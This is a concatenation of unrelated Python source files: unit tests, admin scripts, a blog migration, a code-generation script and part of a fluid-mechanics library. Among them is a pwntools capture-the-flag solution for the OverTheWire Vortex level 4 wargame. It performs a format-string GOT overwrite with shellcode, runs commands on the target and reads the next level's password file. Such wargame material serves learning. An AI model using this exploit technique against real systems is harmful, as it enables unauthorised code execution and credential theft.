# There can be duplicates if routines overridden
prevname = ''
for name in names:
if name[:3] == 'do_':
if name == prevname:
continue
prevname = name
cmd=name[3:]
if help.has_key(cmd):
cmds_doc.append(cmd)
del help[cmd]
elif getattr(self, name).__doc__:
cmds_doc.append(cmd)
else:
cmds_undoc.append(cmd)
print self.doc_leader
self.print_topics(self.doc_header, cmds_doc, 15,80)
self.print_topics(self.misc_header, help.keys(),15,80)
self.print_topics(self.undoc_header, cmds_undoc, 15,80)
def print_topics(self, header, cmds, cmdlen, maxcol):
if cmds:
print header
if self.ruler:
print self.ruler * len(header)
(cmds_per_line,junk)=divmod(maxcol,cmdlen)
col=cmds_per_line
for cmd in cmds:
if col==0: print
print (("%-"+`cmdlen`+"s") % cmd),
col = (col+1) % cmds_per_line
print "\n"
| remybaranx/qtaste | tools/jython/lib/Lib/cmd.py | Python | gpl-3.0 | 12,108 |
''' Unit tests for utils
'''
import collections
import numpy as np
import nose.tools
import mir_eval
from mir_eval import util
def test_interpolate_intervals():
"""Check that an interval set is interpolated properly, with boundaries
conditions and out-of-range values.
"""
labels = list('abc')
intervals = np.array([(n, n + 1.0) for n in range(len(labels))])
time_points = [-1.0, 0.1, 0.9, 1.0, 2.3, 4.0]
expected_ans = ['N', 'a', 'a', 'b', 'c', 'N']
assert (util.interpolate_intervals(intervals, labels, time_points, 'N') ==
expected_ans)
def test_interpolate_intervals_gap():
"""Check that an interval set is interpolated properly, with gaps."""
labels = list('abc')
intervals = np.array([[0.5, 1.0], [1.5, 2.0], [2.5, 3.0]])
time_points = [0.0, 0.75, 1.25, 1.75, 2.25, 2.75, 3.5]
expected_ans = ['N', 'a', 'N', 'b', 'N', 'c', 'N']
assert (util.interpolate_intervals(intervals, labels, time_points, 'N') ==
expected_ans)
@nose.tools.raises(ValueError)
def test_interpolate_intervals_badtime():
"""Check that interpolate_intervals throws an exception if
input is unordered.
"""
labels = list('abc')
intervals = np.array([(n, n + 1.0) for n in range(len(labels))])
time_points = [-1.0, 0.1, 0.9, 0.8, 2.3, 4.0]
mir_eval.util.interpolate_intervals(intervals, labels, time_points)
def test_intervals_to_samples():
"""Check that an interval set is sampled properly, with boundaries
conditions and out-of-range values.
"""
labels = list('abc')
intervals = np.array([(n, n + 1.0) for n in range(len(labels))])
expected_times = [0.0, 0.5, 1.0, 1.5, 2.0, 2.5]
expected_labels = ['a', 'a', 'b', 'b', 'c', 'c']
result = util.intervals_to_samples(
intervals, labels, offset=0, sample_size=0.5, fill_value='N')
assert result[0] == expected_times
assert result[1] == expected_labels
expected_times = [0.25, 0.75, 1.25, 1.75, 2.25, 2.75]
expected_labels = ['a', 'a', 'b', 'b', 'c', 'c']
result = util.intervals_to_samples(
intervals, labels, offset=0.25, sample_size=0.5, fill_value='N')
assert result[0] == expected_times
assert result[1] == expected_labels
def test_intersect_files():
"""Check that two non-identical yield correct results.
"""
flist1 = ['/a/b/abc.lab', '/c/d/123.lab', '/e/f/xyz.lab']
flist2 = ['/g/h/xyz.npy', '/i/j/123.txt', '/k/l/456.lab']
sublist1, sublist2 = util.intersect_files(flist1, flist2)
assert sublist1 == ['/e/f/xyz.lab', '/c/d/123.lab']
assert sublist2 == ['/g/h/xyz.npy', '/i/j/123.txt']
sublist1, sublist2 = util.intersect_files(flist1[:1], flist2[:1])
assert sublist1 == []
assert sublist2 == []
def test_merge_labeled_intervals():
"""Check that two labeled interval sequences merge correctly.
"""
x_intvs = np.array([
[0.0, 0.44],
[0.44, 2.537],
[2.537, 4.511],
[4.511, 6.409]])
x_labels = ['A', 'B', 'C', 'D']
y_intvs = np.array([
[0.0, 0.464],
[0.464, 2.415],
[2.415, 4.737],
[4.737, 6.409]])
y_labels = [0, 1, 2, 3]
expected_intvs = [
[0.0, 0.44],
[0.44, 0.464],
[0.464, 2.415],
[2.415, 2.537],
[2.537, 4.511],
[4.511, 4.737],
[4.737, 6.409]]
expected_x_labels = ['A', 'B', 'B', 'B', 'C', 'D', 'D']
expected_y_labels = [0, 0, 1, 2, 2, 2, 3]
new_intvs, new_x_labels, new_y_labels = util.merge_labeled_intervals(
x_intvs, x_labels, y_intvs, y_labels)
assert new_x_labels == expected_x_labels
assert new_y_labels == expected_y_labels
assert new_intvs.tolist() == expected_intvs
# Check that invalid inputs raise a ValueError
y_intvs[-1, -1] = 10.0
nose.tools.assert_raises(ValueError, util.merge_labeled_intervals, x_intvs,
x_labels, y_intvs, y_labels)
def test_boundaries_to_intervals():
# Basic tests
boundaries = np.arange(10)
correct_intervals = np.array([np.arange(10 - 1), np.arange(1, 10)]).T
intervals = mir_eval.util.boundaries_to_intervals(boundaries)
assert np.all(intervals == correct_intervals)
def test_adjust_events():
# Test appending at the end
events = np.arange(1, 11)
labels = [str(n) for n in range(10)]
new_e, new_l = mir_eval.util.adjust_events(events, labels, 0.0, 11.)
assert new_e[0] == 0.
assert new_l[0] == '__T_MIN'
assert new_e[-1] == 11.
assert new_l[-1] == '__T_MAX'
assert np.all(new_e[1:-1] == events)
assert new_l[1:-1] == labels
# Test trimming
new_e, new_l = mir_eval.util.adjust_events(events, labels, 0.0, 9.)
assert new_e[0] == 0.
assert new_l[0] == '__T_MIN'
assert new_e[-1] == 9.
assert np.all(new_e[1:] == events[:-1])
assert new_l[1:] == labels[:-1]
def test_bipartite_match():
# This test constructs a graph as follows:
# v9 -- (u0)
# v8 -- (u0, u1)
# v7 -- (u0, u1, u2)
# ...
# v0 -- (u0, u1, ..., u9)
#
# This structure and ordering of this graph should force Hopcroft-Karp to
# hit each algorithm/layering phase
#
G = collections.defaultdict(list)
u_set = ['u{:d}'.format(_) for _ in range(10)]
v_set = ['v{:d}'.format(_) for _ in range(len(u_set)+1)]
for i, u in enumerate(u_set):
for v in v_set[:-i-1]:
G[v].append(u)
matching = util._bipartite_match(G)
# Make sure that each u vertex is matched
nose.tools.eq_(len(matching), len(u_set))
# Make sure that there are no duplicate keys
lhs = set([k for k in matching])
rhs = set([matching[k] for k in matching])
nose.tools.eq_(len(matching), len(lhs))
nose.tools.eq_(len(matching), len(rhs))
# Finally, make sure that all detected edges are present in G
for k in matching:
v = matching[k]
assert v in G[k] or k in G[v]
def test_outer_distance_mod_n():
ref = [1., 2., 3.]
est = [1.1, 6., 1.9, 5., 10.]
expected = np.array([
[0.1, 5., 0.9, 4., 3.],
[0.9, 4., 0.1, 3., 4.],
[1.9, 3., 1.1, 2., 5.]])
actual = mir_eval.util._outer_distance_mod_n(ref, est)
assert np.allclose(actual, expected)
ref = [13., 14., 15.]
est = [1.1, 6., 1.9, 5., 10.]
expected = np.array([
[0.1, 5., 0.9, 4., 3.],
[0.9, 4., 0.1, 3., 4.],
[1.9, 3., 1.1, 2., 5.]])
actual = mir_eval.util._outer_distance_mod_n(ref, est)
assert np.allclose(actual, expected)
def test_match_events():
ref = [1., 2., 3.]
est = [1.1, 6., 1.9, 5., 10.]
expected = [(0, 0), (1, 2)]
actual = mir_eval.util.match_events(ref, est, 0.5)
assert actual == expected
ref = [1., 2., 3., 11.9]
est = [1.1, 6., 1.9, 5., 10., 0.]
expected = [(0, 0), (1, 2), (3, 5)]
actual = mir_eval.util.match_events(
ref, est, 0.5, distance=mir_eval.util._outer_distance_mod_n)
assert actual == expected
def test_fast_hit_windows():
ref = [1., 2., 3.]
est = [1.1, 6., 1.9, 5., 10.]
ref_fast, est_fast = mir_eval.util._fast_hit_windows(ref, est, 0.5)
ref_slow, est_slow = np.where(np.abs(np.subtract.outer(ref, est)) <= 0.5)
assert np.all(ref_fast == ref_slow)
assert np.all(est_fast == est_slow)
def test_validate_intervals():
# Test for ValueError when interval shape is invalid
nose.tools.assert_raises(
ValueError, mir_eval.util.validate_intervals,
np.array([[1.], [2.5], [5.]]))
# Test for ValueError when times are negative
nose.tools.assert_raises(
ValueError, mir_eval.util.validate_intervals,
np.array([[1., -2.], [2.5, 3.], [5., 6.]]))
# Test for ValueError when duration is zero
nose.tools.assert_raises(
ValueError, mir_eval.util.validate_intervals,
np.array([[1., 2.], [2.5, 2.5], [5., 6.]]))
# Test for ValueError when duration is negative
nose.tools.assert_raises(
ValueError, mir_eval.util.validate_intervals,
np.array([[1., 2.], [2.5, 1.5], [5., 6.]]))
def test_validate_events():
# Test for ValueError when max_time is violated
nose.tools.assert_raises(
ValueError, mir_eval.util.validate_events, np.array([100., 100000.]))
# Test for ValueError when events aren't 1-d arrays
nose.tools.assert_raises(
ValueError, mir_eval.util.validate_events,
np.array([[1., 2.], [3., 4.]]))
# Test for ValueError when event times are not increasing
nose.tools.assert_raises(
ValueError, mir_eval.util.validate_events,
np.array([1., 2., 5., 3.]))
def test_validate_frequencies():
# Test for ValueError when max_freq is violated
nose.tools.assert_raises(
ValueError, mir_eval.util.validate_frequencies,
np.array([100., 100000.]), 5000., 20.)
# Test for ValueError when min_freq is violated
nose.tools.assert_raises(
ValueError, mir_eval.util.validate_frequencies,
np.array([2., 200.]), 5000., 20.)
# Test for ValueError when events aren't 1-d arrays
nose.tools.assert_raises(
ValueError, mir_eval.util.validate_frequencies,
np.array([[100., 200.], [300., 400.]]), 5000., 20.)
# Test for ValueError when allow_negatives is false and negative values
# are passed
nose.tools.assert_raises(
ValueError, mir_eval.util.validate_frequencies,
np.array([[-100., 200.], [300., 400.]]), 5000., 20.,
allow_negatives=False)
# Test for ValueError when max_freq is violated and allow_negatives=True
nose.tools.assert_raises(
ValueError, mir_eval.util.validate_frequencies,
np.array([100., -100000.]), 5000., 20., allow_negatives=True)
# Test for ValueError when min_freq is violated and allow_negatives=True
nose.tools.assert_raises(
ValueError, mir_eval.util.validate_frequencies,
np.array([-2., 200.]), 5000., 20., allow_negatives=True)
def test_has_kwargs():
def __test(target, f):
assert target == mir_eval.util.has_kwargs(f)
def f1(_):
return None
def f2(_=5):
return None
def f3(*_):
return None
def f4(_, **kw):
return None
def f5(_=5, **kw):
return None
yield __test, False, f1
yield __test, False, f2
yield __test, False, f3
yield __test, True, f4
yield __test, True, f5
def test_sort_labeled_intervals():
def __test_labeled(x, labels, x_true, lab_true):
xs, ls = mir_eval.util.sort_labeled_intervals(x, labels)
assert np.allclose(xs, x_true)
nose.tools.eq_(ls, lab_true)
def __test(x, x_true):
xs = mir_eval.util.sort_labeled_intervals(x)
assert np.allclose(xs, x_true)
x1 = np.asarray([[10, 20], [0, 10]])
x1_true = np.asarray([[0, 10], [10, 20]])
labels = ['a', 'b']
labels_true = ['b', 'a']
yield __test_labeled, x1, labels, x1_true, labels_true
yield __test, x1, x1_true
yield __test_labeled, x1_true, labels_true, x1_true, labels_true
yield __test, x1_true, x1_true
| bmcfee/mir_eval | tests/test_util.py | Python | mit | 11,123 |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
from libformatstr import FormatStr
#from funcy import silent
context(arch='i386',os='linux',timeout=2)
level = 4
host = 'vortex.labs.overthewire.org'
user = 'vortex%i' % level
chal = 'vortex%i' % level
password = args['PASSWORD']
passfile = '/etc/vortex_pass/vortex%i' % (level+1)
binary = '/vortex/%s' % chal
shell = ssh(host=host, user=user, password=password)
# Download the binary for loading ELF information
if not os.path.exists(chal):
shell.download_file(binary)
os.chmod(chal, 0755)
#
# Upload our Python sript for executing with a controlled
# environment and argc==0.
#
shell.set_working_directory()
shell.upload_file('exec.py')
#
# Helper routine to execute the above script,
# with ASLR disabled, and get the output.
#
def execute_with_env(format, padding, binary=binary):
cmd = "python exec.py $%(format)r %(padding)r %(binary)r"
return shell.run(cmd % locals())
#
# Manually discover the offset of the argument we're looking for
#
# Dump the stack, until our format string is properly
# aligned on a 4-byte boundary. Use '%x' to dump the
# stack to see this, and adjust the alignment with the
# environment variable that follows our format string.
#
offset = 0
padding = -1
stack_dump = '%4x\n'*0x100
result = ''
XXXX = enhex('XXXX')
while not offset:
padding += 1
result = execute_with_env(stack_dump, padding).recvall()
lines = result.splitlines()
if XXXX in lines:
offset = lines.index(XXXX)
log.info("Need padding: %s" % padding)
log.info("Found offset: %s" % offset)
# We can execute on the stack.
# In order to do that, we need to know where on the stack our
# buffer is in absolute terms.
#
# A small helper program is uploaded and compiled, which prints
# out relevant addresses.
shell.upload_file('leak.c')
shell.gcc('-m32 leak.c -o leak')
result = execute_with_env(stack_dump, padding, './leak').recvall().strip()
log.info("Stack leaker says:\n%s" % result)
exec(result) # creates 'sc'
# Adjust the offset to account for arg0 being the format
# string, and the 'XXXX' that we want to skip over.
# And then one more for good measure, which I don't understand.
offset += 2
# Now that we know the offsets on the stack, we can generate
# our format string exploit.
#
# Note that start_len=2 because of 'c=' that is printed.
e = ELF(chal)
f = FormatStr()
f[e.got['exit']]=sc
payload = f.payload(offset, start_len= len('c=XXXX'))
payload += cyclic(len(stack_dump) - len(payload))
log.info("Payload created, sending exploit")
remote = execute_with_env(payload, padding)
remote.clean(2)
remote.sendline('id')
log.success(remote.recv().strip())
remote.sendline('cat %s' % passfile)
password = remote.recv().strip()
log.success('Password: %s' % password)
print password
| sigma-random/pwntools-write-ups | wargames/overthewire-vortex/level4/win.py | Python | mit | 2,851 |
#!/usr/bin/env python
"""
Do the initial installation and configuration of the DIRAC MySQL server
"""
from __future__ import print_function
from DIRAC.Core.Base import Script
Script.disableCS()
Script.setUsageMessage( '\n'.join( ['Stop DIRAC component using runsvctrl utility',
'Usage:',
' %s [option|cfgfile] ... [system [service|agent]]' % Script.scriptName,
'Arguments:',
' system: Name of the system for the component (default *: all)',
' service|agent: Name of the particular component (default *: all)' ] ) )
Script.parseCommandLine()
args = Script.getPositionalArgs()
from DIRAC.FrameworkSystem.Client.ComponentInstaller import gComponentInstaller
__RCSID__ = "$Id$"
if len( args ) > 2:
Script.showHelp()
exit( -1 )
system = '*'
component = '*'
if len( args ) > 0:
system = args[0]
if system != '*':
if len( args ) > 1:
component = args[1]
#
#
gComponentInstaller.exitOnError = True
#
result = gComponentInstaller.runsvctrlComponent( system, component, 'd' )
if not result['OK']:
print('ERROR:', result['Message'])
exit( -1 )
gComponentInstaller.printStartupStatus( result['Value'] )
| fstagni/DIRAC | FrameworkSystem/scripts/dirac-stop-component.py | Python | gpl-3.0 | 1,302 |
from blogging.tag_lib import parse_content
from blogging.models import BlogContent, BlogParent, BlogContentType
import json
import os
def convert_tags(blog,tag_name,fd):
tag = {}
# tag['name'] = tag_name + '_tag'
tag['name'] = tag_name
content = parse_content(blog,tag)
if len(content) > 0:
fd.write("\nConverting "+ blog.title + "\n")
tmp = {}
# tmp[tag_name] = content
tmp['content'] = content
tag['name'] = 'pid_count_tag'
content = parse_content(blog,tag)
if len(content) > 0:
tmp['pid_count'] = content
else:
tmp['pid_count'] = '0'
fd.write(json.dumps(tmp) + "\n\n")
blog.data = json.dumps(tmp)
return True
else:
return False
def migrate():
blogs = BlogParent.objects.all()
content_type = BlogContentType.objects.get(content_type='DefaultSection')
form_filename = os.path.abspath(os.path.dirname(__file__))+"/custom/"+"migrate_sections.txt"
fd = os.fdopen(os.open(form_filename,os.O_CREAT| os.O_RDWR , 0555),'w')
for blog in blogs:
if(convert_tags(blog, 'Body', fd)):
blog.content_type = content_type
blog.save()
continue
elif (convert_tags(blog, 'content', fd)):
blog.content_type = content_type
blog.save()
continue
elif(convert_tags(blog, 'Content', fd)):
blog.content_type = content_type
blog.save()
continue
elif(convert_tags(blog, 'Summary', fd)):
blog.content_type = content_type
blog.save()
continue
elif(convert_tags(blog, 'Preface', fd)):
blog.content_type = content_type
blog.save()
continue
else:
print "NO TAGs FOUND in " + blog.title
tmp = {}
tmp['content'] = blog.data
tmp['pid_count'] = '0'
fd.write("\nAdding "+ blog.title + "\n")
fd.write(json.dumps(tmp) + "\n\n")
blog.data = json.dumps(tmp)
blog.content_type = content_type
print " Going to save " , blog , blog.content_type
blog.save()
fd.close()
if __name__ == "__main__":
migrate()
| PirateLearner/pi | PirateLearner/blogging/db_migrate.py | Python | gpl-2.0 | 2,332 |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This script is used to synthesize generated parts of this library."""
import synthtool as s
import synthtool.gcp as gcp
import synthtool.languages.java as java
gapic = gcp.GAPICGenerator()
service = 'texttospeech'
versions = ['v1','v1beta1']
config_pattern = '/google/cloud/texttospeech/artman_texttospeech_{version}.yaml'
for version in versions:
library = gapic.java_library(
service=service,
version=version,
config_path=config_pattern.format(version=version),
artman_output_name='')
s.copy(library / f'gapic-google-cloud-{service}-{version}/src', 'src')
s.copy(library / f'grpc-google-cloud-{service}-{version}/src', f'../../google-api-grpc/grpc-google-cloud-{service}-{version}/src')
s.copy(library / f'proto-google-cloud-{service}-{version}/src', f'../../google-api-grpc/proto-google-cloud-{service}-{version}/src')
java.format_code('./src')
java.format_code(f'../../google-api-grpc/grpc-google-cloud-{service}-{version}/src')
java.format_code(f'../../google-api-grpc/proto-google-cloud-{service}-{version}/src')
| vam-google/google-cloud-java | google-cloud-clients/google-cloud-texttospeech/synth.py | Python | apache-2.0 | 1,663 |
# -*- coding: utf-8 -*-
"""Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2016, 2017, 2018, 2019, 2020 Caleb Bell
<Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
This module contains basic fluid mechanics and engineering calculations which
have been found useful by the author. The main functionality is calculating
dimensionless numbers, interconverting different forms of loss coefficients,
and converting temperature units.
For reporting bugs, adding feature requests, or submitting pull requests,
please use the `GitHub issue tracker <https://github.com/CalebBell/fluids/>`_
or contact the author at Caleb.Andrew.Bell@gmail.com.
.. contents:: :local:
Dimensionless Numbers
---------------------
.. autofunction:: Archimedes
.. autofunction:: Bejan_L
.. autofunction:: Bejan_p
.. autofunction:: Biot
.. autofunction:: Boiling
.. autofunction:: Bond
.. autofunction:: Capillary
.. autofunction:: Cavitation
.. autofunction:: Confinement
.. autofunction:: Dean
.. autofunction:: Drag
.. autofunction:: Eckert
.. autofunction:: Euler
.. autofunction:: Fourier_heat
.. autofunction:: Fourier_mass
.. autofunction:: Froude
.. autofunction:: Froude_densimetric
.. autofunction:: Graetz_heat
.. autofunction:: Grashof
.. autofunction:: Hagen
.. autofunction:: Jakob
.. autofunction:: Knudsen
.. autofunction:: Lewis
.. autofunction:: Mach
.. autofunction:: Morton
.. autofunction:: Nusselt
.. autofunction:: Ohnesorge
.. autofunction:: Peclet_heat
.. autofunction:: Peclet_mass
.. autofunction:: Power_number
.. autofunction:: Prandtl
.. autofunction:: Rayleigh
.. autofunction:: relative_roughness
.. autofunction:: Reynolds
.. autofunction:: Schmidt
.. autofunction:: Sherwood
.. autofunction:: Stanton
.. autofunction:: Stokes_number
.. autofunction:: Strouhal
.. autofunction:: Suratman
.. autofunction:: Weber
Loss Coefficient Converters
---------------------------
.. autofunction:: K_from_f
.. autofunction:: K_from_L_equiv
.. autofunction:: L_equiv_from_K
.. autofunction:: L_from_K
.. autofunction:: dP_from_K
.. autofunction:: head_from_K
.. autofunction:: head_from_P
.. autofunction:: f_from_K
.. autofunction:: P_from_head
Temperature Conversions
-----------------------
These functions used to be part of SciPy, but were removed in favor
of a slower function `convert_temperature` which removes code duplication but
doesn't have the same convenience or easy to remember signature.
.. autofunction:: C2K
.. autofunction:: K2C
.. autofunction:: F2C
.. autofunction:: C2F
.. autofunction:: F2K
.. autofunction:: K2F
.. autofunction:: C2R
.. autofunction:: K2R
.. autofunction:: F2R
.. autofunction:: R2C
.. autofunction:: R2K
.. autofunction:: R2F
Miscellaneous Functions
-----------------------
.. autofunction:: thermal_diffusivity
.. autofunction:: c_ideal_gas
.. autofunction:: nu_mu_converter
.. autofunction:: gravity
"""
from __future__ import division
'''
Additional copyright:
The functions C2K, K2C, F2C, C2F, F2K, K2F, C2R, K2R, F2R, R2C, R2K, R2F
were deprecated from scipy but are still wanted by fluids
Taken from scipy/constants/constants.py as in commit
https://github.com/scipy/scipy/commit/4b7d325cd50e8828b06d628e69426a18283dc5b5
Also from https://github.com/scipy/scipy/pull/5292
by Gillu13 (Gilles Aouizerate)
They are copyright individual contributors to SciPy, under the BSD 3-Clause
The license of scipy is as follows:
Copyright (c) 2001-2002 Enthought, Inc. 2003-2019, SciPy Developers.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
from math import sqrt, sin, exp, pi, fabs, copysign
from fluids.constants import g, R
import sys
__all__ = ['Reynolds', 'Prandtl', 'Grashof', 'Nusselt', 'Sherwood', 'Rayleigh',
'Schmidt', 'Peclet_heat', 'Peclet_mass', 'Fourier_heat', 'Fourier_mass',
'Graetz_heat', 'Lewis', 'Weber', 'Mach', 'Knudsen', 'Bond', 'Dean', 'Morton',
'Froude', 'Froude_densimetric', 'Strouhal', 'Biot', 'Stanton', 'Euler', 'Cavitation', 'Eckert',
'Jakob', 'Power_number', 'Stokes_number', 'Drag', 'Capillary', 'Bejan_L', 'Bejan_p', 'Boiling',
'Confinement', 'Archimedes', 'Ohnesorge', 'Suratman', 'Hagen', 'thermal_diffusivity', 'c_ideal_gas',
'relative_roughness', 'nu_mu_converter', 'gravity',
'K_from_f', 'K_from_L_equiv', 'L_equiv_from_K', 'L_from_K', 'dP_from_K',
'head_from_K', 'head_from_P', 'f_from_K',
'P_from_head', 'Eotvos',
'C2K', 'K2C', 'F2C', 'C2F', 'F2K', 'K2F', 'C2R', 'K2R', 'F2R', 'R2C', 'R2K', 'R2F',
'PY3',
]
version_components = sys.version.split('.')
PY_MAJOR, PY_MINOR = int(version_components[0]), int(version_components[1])
PY3 = PY_MAJOR >= 3
### Not quite dimensionless groups
def thermal_diffusivity(k, rho, Cp):
r'''Calculates thermal diffusivity or `alpha` for a fluid with the given
parameters.
.. math::
\alpha = \frac{k}{\rho Cp}
Parameters
----------
k : float
Thermal conductivity, [W/m/K]
rho : float
Density, [kg/m^3]
Cp : float
Heat capacity, [J/kg/K]
Returns
-------
alpha : float
Thermal diffusivity, [m^2/s]
Notes
-----
Examples
--------
>>> thermal_diffusivity(k=0.02, rho=1., Cp=1000.)
2e-05
References
----------
.. [1] Blevins, Robert D. Applied Fluid Dynamics Handbook. New York, N.Y.:
Van Nostrand Reinhold Co., 1984.
'''
return k/(rho*Cp)
### Ideal gas fluid properties
def c_ideal_gas(T, k, MW):
r'''Calculates speed of sound `c` in an ideal gas at temperature T.
.. math::
c = \sqrt{kR_{specific}T}
Parameters
----------
T : float
Temperature of fluid, [K]
k : float
Isentropic exponent of fluid, [-]
MW : float
Molecular weight of fluid, [g/mol]
Returns
-------
c : float
Speed of sound in fluid, [m/s]
Notes
-----
Used in compressible flow calculations.
Note that the gas constant used is the specific gas constant:
.. math::
R_{specific} = R\frac{1000}{MW}
Examples
--------
>>> c_ideal_gas(T=303, k=1.4, MW=28.96)
348.9820953185441
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
Rspecific = R*1000./MW
return sqrt(k*Rspecific*T)
### Dimensionless groups with documentation
def Reynolds(V, D, rho=None, mu=None, nu=None):
r'''Calculates Reynolds number or `Re` for a fluid with the given
properties for the specified velocity and diameter.
.. math::
Re = \frac{D \cdot V}{\nu} = \frac{\rho V D}{\mu}
Inputs either of any of the following sets:
* V, D, density `rho` and kinematic viscosity `mu`
* V, D, and dynamic viscosity `nu`
Parameters
----------
V : float
Velocity [m/s]
D : float
Diameter [m]
rho : float, optional
Density, [kg/m^3]
mu : float, optional
Dynamic viscosity, [Pa*s]
nu : float, optional
Kinematic viscosity, [m^2/s]
Returns
-------
Re : float
Reynolds number []
Notes
-----
.. math::
Re = \frac{\text{Momentum}}{\text{Viscosity}}
An error is raised if none of the required input sets are provided.
Examples
--------
>>> Reynolds(2.5, 0.25, 1.1613, 1.9E-5)
38200.65789473684
>>> Reynolds(2.5, 0.25, nu=1.636e-05)
38202.93398533008
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
if rho is not None and mu is not None:
nu = mu/rho
elif nu is None:
raise ValueError('Either density and viscosity, or dynamic viscosity, \
is needed')
return V*D/nu
def Peclet_heat(V, L, rho=None, Cp=None, k=None, alpha=None):
r'''Calculates heat transfer Peclet number or `Pe` for a specified velocity
`V`, characteristic length `L`, and specified properties for the given
fluid.
.. math::
Pe = \frac{VL\rho C_p}{k} = \frac{LV}{\alpha}
Inputs either of any of the following sets:
* V, L, density `rho`, heat capacity `Cp`, and thermal conductivity `k`
* V, L, and thermal diffusivity `alpha`
Parameters
----------
V : float
Velocity [m/s]
L : float
Characteristic length [m]
rho : float, optional
Density, [kg/m^3]
Cp : float, optional
Heat capacity, [J/kg/K]
k : float, optional
Thermal conductivity, [W/m/K]
alpha : float, optional
Thermal diffusivity, [m^2/s]
Returns
-------
Pe : float
Peclet number (heat) []
Notes
-----
.. math::
Pe = \frac{\text{Bulk heat transfer}}{\text{Conduction heat transfer}}
An error is raised if none of the required input sets are provided.
Examples
--------
>>> Peclet_heat(1.5, 2, 1000., 4000., 0.6)
20000000.0
>>> Peclet_heat(1.5, 2, alpha=1E-7)
30000000.0
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
if rho is not None and Cp is not None and k is not None:
alpha = k/(rho*Cp)
elif alpha is None:
raise ValueError('Either heat capacity and thermal conductivity and\
density, or thermal diffusivity is needed')
return V*L/alpha
def Peclet_mass(V, L, D):
r'''Calculates mass transfer Peclet number or `Pe` for a specified velocity
`V`, characteristic length `L`, and diffusion coefficient `D`.
.. math::
Pe = \frac{L V}{D}
Parameters
----------
V : float
Velocity [m/s]
L : float
Characteristic length [m]
D : float
Diffusivity of a species, [m^2/s]
Returns
-------
Pe : float
Peclet number (mass) []
Notes
-----
.. math::
Pe = \frac{\text{Advective transport rate}}{\text{Diffusive transport rate}}
Examples
--------
>>> Peclet_mass(1.5, 2, 1E-9)
3000000000.0
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
'''
return V*L/D
def Fourier_heat(t, L, rho=None, Cp=None, k=None, alpha=None):
r'''Calculates heat transfer Fourier number or `Fo` for a specified time
`t`, characteristic length `L`, and specified properties for the given
fluid.
.. math::
Fo = \frac{k t}{C_p \rho L^2} = \frac{\alpha t}{L^2}
Inputs either of any of the following sets:
* t, L, density `rho`, heat capacity `Cp`, and thermal conductivity `k`
* t, L, and thermal diffusivity `alpha`
Parameters
----------
t : float
time [s]
L : float
Characteristic length [m]
rho : float, optional
Density, [kg/m^3]
Cp : float, optional
Heat capacity, [J/kg/K]
k : float, optional
Thermal conductivity, [W/m/K]
alpha : float, optional
